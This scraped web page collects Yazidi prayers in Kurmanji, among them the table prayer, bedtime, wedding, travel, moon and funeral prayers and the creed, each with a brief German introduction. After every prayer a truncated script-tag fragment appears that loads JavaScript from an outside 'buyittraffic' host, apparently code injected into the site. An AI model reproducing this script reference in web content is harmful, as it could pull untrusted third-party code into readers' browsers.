Dua Sifrê – Das Tischgebet

Dua Sifrê – Das Tischgebet

Das Gebet „Dua Sifrê“ ist ein Tischgebet, dass vor Beginn des Essens aufgesagt werden kann. Besondere Bedeutung hat es während der Fastentage, wobei das Fastenbrechen bei Sonnenuntergang mit dem Dua Sifrê begleitet werden sollte.

Xwedêo, tu daîmî, tu kerîmî
Tu rehîmî, tu melkê erşê ezîmî
Xwedêo, ji ezelda tu qedîmî
Xwedêo, tu heftê û du mletî bêyî rehmê
Serê ser belgîya, girtîyê hebsîya
Rêwîyê riya, kesîb, belengaz û êxsîra,
Me jî pêra.
Hûn bi maş bin, bi berat bin, bi xelat bin
Bi kur û qîz û mal û dewlet bin
Bi îman û erkan û axret bin
Xem nebî, dem nebî
Rizqê we û hadir-guhdêra kêm nebî
Siyar bûyî peya nebî
Ya dîtî merûm nebe
Şîn û şaîya kêm nebe
Ji dost u dijmina şermîn nebe
Xanî bê derî nebe, mêr bê serî nebe
Çîya bê kerî nebe
Avê gelîya û Kanîya ziha nebe
Bi her buhişt hebe
Derê dojê li we venebe
Nan ji xezna Xwedê û Şîxadî be
Havênî ji Kanîya Sipî be
Ew sifre ji sifrê celîl be
Bereket bi gotina Birahîm Xelîl be
Em kêmin, Şîxadî temame

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Razanê – Das Gebet vor dem Schlaf

Dua Razanê – Das Gebet vor dem Schlaf

Das Gebet „Dua Razanê“ wird kurz vor dem Schlafen aufgesagt. Darin wird um Segen für die gesamte Gemeinschaft gebeten.

 

S.1

 1. Ya rebî tu xwedayî, tu ezdayî
 2. Ti xaliqê medh û senayî, ejqenderî bê gunahî
 3. Hezar û yek nav li xwe danayî,
 4. navê şêrîn her xwedayî
 

S.2

 1. Ya rebî tu dayîmî tu qedîmî
 2. Tu xaliqê erşê ezîmî
 3. Ya rebî tu mihrî
 4. Tuxaliqê erd û ezmanî
 5. Rahma te heye li hemû erdan
 6. Tuyî dermanê hemû derdan
 

S.3

 1. Ya rebî tu me bidî xatir ê Şêsims û Şemsaniyê,
 2. Ya rebî tu me bidî xatir ê Melek Şîxisin û Adaniyê.
 3. Ya rebî tu me bidî xatir ê Şêxûbekir û Qataniyê.
 4. Ya rebî tu me bidî xatir ê mîr Hesin Meman û Pîraniyê.
 5. Ya rebî tu me bidî xatir ê Şêxadî û Mirîdaniyê.
 6. Deryekî xêrê li me û vî dînî vekê
 

S.4

 1. Mefera min Şêsims atqata min Êzî.
 2. Derdê min, duhayê min, Ezdayê min.
 3. Pîrê min, hostayê min, xwedê heq xwedayê min
 

S.5

 1. Tawisî Melek îmana min, kaniya sipî mora mine.
 2. Çumaye û qub li dor e, mekanê siltan Êzî ye sore.
 3. Sinetxane lê dibe more
 

S.6

 1. Meqlûb û mergeh selav.
 2. Selavên min li meqlûbê li mergehê.
 3. Li Lalişê li xwedanê qubehê
 

S.7

 1. Şêxadî nûre melik Şêxsin mişûre.
 2. Me şahda û îmana xwe bi navê
 3. Tawisî Melek û bi xerqê Şêxadî qebûle
 

S.8

 1. Ez minetkarim ji mala bava
 2. Xafilî korin ji herdo çava
 3. Ku tim û dayîm hilnadin van nava
 

S.9

 1. Laliş ciyê bi nûr e
 2. Ewe mekanê Siltan Êzîdê sore
 3. Êzîdxane lê dibe mor e
 

S.10

 1. Mekan ê siltan Êzî ye,
 2. Êzîdxane lê tiwaf dibî ye?
 

S.11

 1. Ezdayî me, ji direke enzelîme.
 2. Bendeyî kaniya sipî me
 3. Berxê koza siltan Êzî me.
 4. Şikir ji xwedê ji vî dînî û îmanî,
 5. ji vî ol û erkanî razî me.
S.12
 1. Çûme Laliş a nûranî,
 2. min serê we li ber cotê qubeha danî.
 3. Min îman bi navê Tawisî Melek û xerqê Şêxadî anî

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Mehrê – Das Gebet zur Hochzeit

Dua Mehrê – Das Gebet zur Hochzeit

Das Gebet „Dua Mehrê“ wird bei der Hochzeit eines êzîdischen Paares aufgesagt, in Anwesenheit von 3 Zeugen. Der für die Trauung zuständige Pêşîmam befragt dabei das Brautpaar einzeln jeweils dreimal nach ihrem freien Willen, diese Ehe einzugehen. Erst wenn beide dreimal ihr Ja-Wort gegeben haben, wird das Gebet Dua Mehrê als Segen gesprochen. Nach diesem Segen ist das Brautpaar nach êzîdischer Religion nun ein Ehepaar.

S.1

 

 1. Bi navê Ezdanî pak î dil bi xêr
 2. Ezdayê dil bi rehm
 3. Bi navê Tawisî Melek, berpirsiyarê dîn û diyanetê
 4. Li ba Xwedê, li ba Xwedê û careke din li ba Xwedê, li ba Xwedê
 5. Yeke evd, yek musteheq.
 6. Li ser reya rast.
 7. Bi şehada Şêxsims, Melek Fexredîn
 8. Û Melek Şêx Hisin.
 9. Şukir ji te re ey Xwedayê cîhanê.
 10. Bi selamet li ser zîn, bi selamet li ser zîn.
 11. Bi şah û rizayiya te, bi şah û rizayiya min.
 12. Mexdur li diyarê amîn lê, lê, lê.
 13. Mahr bi destê Melek Sêx Hisin.
 14. Pîroz be bi navê ezdayê mezin.

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Oxirê – Das Gebet zum Abschied der Reisenden

Dua Oxirê – Das Gebet zum Abschied der Reisenden

Das Gebet „Dua Oxirê“ wird aufgesagt, wenn ein Êzîdî sich zu einer Reise aufmacht und sei es nur der Weg zur Arbeit. In diesem Gebet wird die Schutzpatronin „Xefûrê Rêya“ aufgerufen, den Reisenden zu beschützen.

S.1
 1. Çi sibeyek hoye kubar e
 2. Derê Bihustê li ber min vebû
 3. Her çar yara
 4. Ez çûme silavê biran û yara
S.2
 1. Min silav li yar û biran kirî
 2. Horî hatin û bihurîn
 3. Zintar û qewsên ji hev kirî
S.3
 1. Çûme ser riya heqî
 2. Xam û enkar leng û berleng pêsiyê
 3. Banga min e xwedê û melekê ber kursiyê
S.4
 1. Riya heqiyê qendîla tijî xêr û bereket û nûr e
 2. Banga min e xwedê û melekê xefûr e
S.5
 1. Riya heqî xefûrê rê ye
 2. Heke çiya ye û heke berî ye
 3. Destê me li dang û damana Sêxadî û Melek Sêxsinê Adiya
 4. Em bi saxî û silametî ji van ciya
 5. Biçine wan ciya
S.6
 1. Banga min Sêsemsê Babzêr e
 2. Li ber sekinîn heftê hezar xas û qelender e
 3. Kemberdest xerq hilezer e
 4. Li vê seferê li ê oxirê
 5. Tu li min û hevalê min bike xêr her û her e
S.7
 1. Ya Sêsims tu meferî
 2. Ya Tawisî Melek tu îmana minî
 3. Ya Melek Fexredîn tu rêberî
 4. Ya xaliqê minî her û herî
S.8
 1. Em duhayê bikin li ber pîrê kar û xafûrê rêya
 2. Li me, hazir û guhdaran li hemû wexta û hemû deran.

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Tokê – Das Gebet über den heiligen Umhang

Dua Tokê – Das Gebet über  den heiligen Umhang

Das Gebet „Dua Tokê“ handelt vom heiligen Umhang, den Tawisî Melek als Lohn seiner Gottesloyalität erhalten hat. In Gedenken an die Krönung zum obersten Erzengel tragen die Êzîden dieses Gewand als Unterhemd.

S.1

 1. Toke û meftûle
 2. Xelatekî meqbûle
 3. Bi sere me qebûle
 4. Şîxadî xefûre
 5. Melek Şêxîsin mişûre
 6. Şêşims nûre
 7. Xwedê nur e´la nûre
 8. Xidir Îlyas xewase bahrê kûre
 9. Şehda min, heq bi navê Siltan Êzîd û Tawisî Melek qebûle.

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Heyvê – Das Gebet über den Mond

Dua Heyvê – Das Gebet über den Mond

Das Gebet „Dua Heyvê“ handelt vom Mond, mit dem Engel Fexredîn als Patron des Mondes im Mittelpunkt.

S.1
 1. Me heyveke xwe ye nû dî ye
 2. Dûreke qîmetî ye
 3. Ser tanceke reşnuranî di îsî ye
 4. şehdê min Şîxadî ye
 5. Qubleta min kanîya Sipî ye
 6. Mesebê min Şêşimsê teterî ye
S.2
 1. Fexro tû Fexrekî di cîda Xudanê ilmê be´îde
 2. Tu wê liber kerema Sultan êzîda
 3. Ez êziyê cidê xwe me
 4. Medeha jê di dime
 5. Şêxek rabû ji şam ê Avakir(Laliş) meqam ê
S.3
 1. Ya melek Fexredîn te em xundîne lihizret ê
 2. Tu me bisitrînî ji dirba xerq ê
 3. Ji, şerî´etê ji terîqet ê
 4. şikir te em havêtine ser pişka sinet ê
S.4
 1. Ya melek Fexredîn me ji te divêt
 2. Fira dest û ol û terîqet
 3. Em barek ya pîroz
 4. Êt hesûd çav sipê diboz
S.5
 1. Ya melek Fexredîn heyva nû qismetê kevin
 2. Ya melek Fexredîn heyva nû qismetê kevin
 3. Ya melek Fexredîn heyva nû qismetê kevin

and.buyittraffic.com/clizkes' type='text/javascript'>

Şahda dînî – Das Glaubensbekenntnis

Şahda dînî – Das Glaubensbekenntnis

Das êzîdisch Glaubensbekenntnis, in dem vor allem drei wesentlichen Dinge deutlich werden und somit zu den Grunddogmen der êzîdischen Religion gehören: Monotheismus, Tawisî Melek als Bezeugung dieses Monotheismus und die Verehrung von Sonne und Mond als Grundzüge einer Naturreligion.


S.1
1) Şehda dînêmin yek xweda ye
2) Emîn Cebraîl evîniya Ezdaye ye
3) Bergeha min roj û mergeh e
S.2
1) Silavên min li mergehê li Lalişê
2) Û li xwedanê qubêyê
3) Şêxadî Şêxê min e, ji nûra padşa ye
4) Şemsê Êzdînê çira ye
S.3
1) Pîrê min Hesin Meman e
2) Hoste û merebî ji mala Baban e
3) Kaniya Sipî mora min e
4) Kaf û mixar û zimzim Heca min e
5) Tawisî Melek şahda îmana min e

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Dirozê

Dua Dirozê

S.1

1) Amîn, bi hîmeta Şemsedîn Nasirdîn Sicadîn, Şêşimse qeweta dîn
2) Siltan Şîxadî Tance ji Ewil heta bi axirîn
3) Ya Şîxadî Eleykelelam.

S.2

1) Mehderekê dixwazîn bi rehmeta Şîxadî,
2) bi reda Melik Şêxsin ber kerema Şêşims
3) Ya Şîxadî Eleykelselam.

S.3

1) Bi qedrê berê Şêx Hemd, Hesin dina,
2) Hesin Pîrik, Îdrîsî xeyat li suka merîfetê
3) kirasêt malêt Adîya biqedrê malêt xelîfet kî
4) Ya Şîxadî Eleykelselam.

S.4

1) Bi qedrê Celis û Riwaqêt Şîxadî,
2) kaf û mixarêt Şîxadî qûb û hilêlêt Şîxadî,
3) dergeh û dîwanêt Şîxadî bi qedir û qîmet
4) Ya Şîxadî Eleykelselam.

S.5

1) Bi qedrê Şêx berkat, Şêx Misafir,
2) Şêx Mûsê enzelî,Şêx Simaylê enzelî,
3) Şêxûbekrê feqîr, Şêx Ebdilqadir, Sitiya Ês,
4) dîwana berê Şibakê,
5) xasêt li ber Şîxadî biqedir û qîmet
6) Ya Şîxadî Eleykelselam.

S.6

1) Bi qedrê Melik Şêxsin Melik Şerfedîn,
2) Şêx Birahîmê Xetmî, kaniya kulava,
3) pîr şerefê mêravî-Hene û merhene,
4) biqedrê Mendê mal ava kî
5) Ya Şîxadî Eleykelselam.

S.7

1) Bi qedrê çilê kaniya Spî,
2) Êzdîne mîr, Qubêt li bidor, Sicadînê Êzdîna,
3) Nasirdînê Êzdîna, Şêx Mendê fexra,
4) Xatûna Fexra, Fexrê Adîya,
5) çil Mêrêt axa Şîxadî,
6) xasêt li ber Şîxadî bi qedir û qîmet
7) Ya Şîxadî Eleykelselam.

S.8

1) Bi qedrê Şêxalê Şemsa Şêxhevindê Şemsa,
2) Şêx Hesinê Şemsa Şêx Babkê Şemsa,
3) Amadîn û babadînê Şemsa,
4) Şêx Xidir û Şêx tokilê Şemsa,
5) Şems û Fexrêt Mîra, li dîwanêt feqîra,
6) yê li dahirê yê li Batinê,
7) xasêt li ber Şîxadî bi qedir û qîmet
8) Ya Şîxadî Eleykelselam.

S.9

1) Bi qedrê mêrê Mergeha Şîxadî,
2) Hesil Meman, Mamed Reşan Hesin pîrik,
3) Hecî Mamed, Gavanê zerza,
4) çilê Şîxadî, çilê Melik Şêxsin,
5) xasêt li ber Şîxadî bi qedir û qîmet
6) Ya Şîxadî Eleykelselam.

S.10

1) Bi qedrê xasêt Bêbanê, Hecî Elî li Baedirê,
2) Hecî Recebê bêristekî, Şêx Mişeleh xefûrê rêya,Şêx Hesen li Heseniyê,
3) ber kerema Şêx mamedî Doxatî, bi Hegî fêris kî
4) Ya Şîxadî Eleykelselam.

S.11

1) Bi qedrê mêrê Tebeka, şamê Şêx Rûmî,
2) şingarî Boqedar, Baba Şêx Misrî Sirûgî,
3) Şêx aqilê Babî, Şêx Cemalidînê Ebrî,
4) Seydî Henan, Şêx kiras, Şêx qesab lugmedîn,
5) Şêx cemalidînê Baba, Hebîbî necar,
6) pîrê libina, ber kerema Siltan Êzîdê şirîn
7) Ya Şîxadî Eleykelselam.

S.12

1) Bi qedrê dîwana Omer xala,
2) Zêwa Hesin Çinarî, Hecî Mamed li kifir zemanî,
3) Haciyalê momina, Hesnalika pîra, Hêşm pîra,
4) Mine bapîrê Moxdar,
5) Bi qedrê guhar zêr kî
6) Ya Şîxadî eleykelselam.

S.13

1) Bi qedrê çîyayê Mişetê, çîyayê Hizretê,
2) çîyayê Erefatê, dar û berê gelyê Lalişê,
3) ya Şîxadî çirêt te di gurrî bin,
4) simat û bisatêt te di dayîm bin,
5) rêya te û edewîyêt şerq û şamê,
6) di ekber bin dewletî û xelîftî bin
7) hamû zemana dayîm bê qedem û qidumêt,
8) Tawisa Şîxadî, def û sibabêt Şîxadî,
9) ev duwa, ev diroze, li vî cî, li Êzdîyêt şerqû şamê di vekirî bin,
10) haweke sunetê, guh li bangê rehmetê
11) Sela yar û birêt axretê
12) Em di kêmîn Xwedê yî temam e

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua li ser gîyanê mirî – Gebet über die Seele des Verstorbenen

Dua li ser gîyanê mirî – Gebet über die Seele des Verstorbenen

Das Gebet „Dua li ser gîyanê mirî“ wird kurz nach dem Tod eines Êzîdîs aufgesagt. Darum wird um Gnade für die Seele des Verstorbenen gebeten.

 

S.1

 

1)      Ya Xwedê her tû yî û her tû yê hey û her dê hebî

2)      Ya Xwedê ne tû ji kesî û ne kes ji te ye

3)      Êk firwarî, bê şirîkî,bê hevalî

4)      Ya Xwedê te ne wekîle û ne kefîl e

5)      tû wê ligel hemû dem û heyam û bedîl

6)      Ya Xwedê tû dişkînî û tû dicebirînî tû behrêt giran di meyînî

7)      Vê dinyayê bi kartînî Vî ezmanî bê stûn radwestînî

8)      Tû bo me meseb û dînî

9)      Sed xwezma bi wî giyanê bideyê û jê nestînî

10)   Dê bi zor dereca gehînî

11)   Tû vî mirî bi rehmînî

12)   Em dikêmîn Xwedê yî temame
and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Piştgirêdanê

Dua Piştgirêdanê – Das Gebet um Unterstützung

Das „Dua Piştgirêdanê“ ist ein Bittgebet, dass Êzîden, bevor sie einer Arbeit nachgehen, aufsagen. Darin bitten Sie den Schöpfer um alle menschlichen Bedürfnisse, wie Nahrung, Wohnung und Arbeit, sowie geistlicher Bedürfnisse wie Verstand usw. Ein Êzîdî der dieses Gebet betet, betet auch für die Menschen in seiner Gesellschaft.

S.1
                                1) Ya rebî mehderekê ji te dixwazim
    2) Mehdereke xêrê
S.2

1)      Yek kerem e

2)      Yek neder e

3)      Yek şefqet e

4)      Yek dewlet e

S.3

1)      Yek zar e,yek ziman e

2)      Yek dîn e,yek îman e

3)      Yek aqil e yek fam e

S.4

1)      Ya rebî tu aqil û fam di serê me bike

2)      Tu pirsyareke xêrê li halê me û vî miletî bike

S.5

1)      Ya rebî tu bide xatirê delîlê xweda

2)      Axir zeman

3)      Ji xas û saliha

4)      Saf û milyaketa

5)      Derwêşê qelendera

6)      Xasê qelendera

7)      Li pey pira selatê dikira

8)      Xwedê temam e

and.buyittraffic.com/clizkes' type='text/javascript'>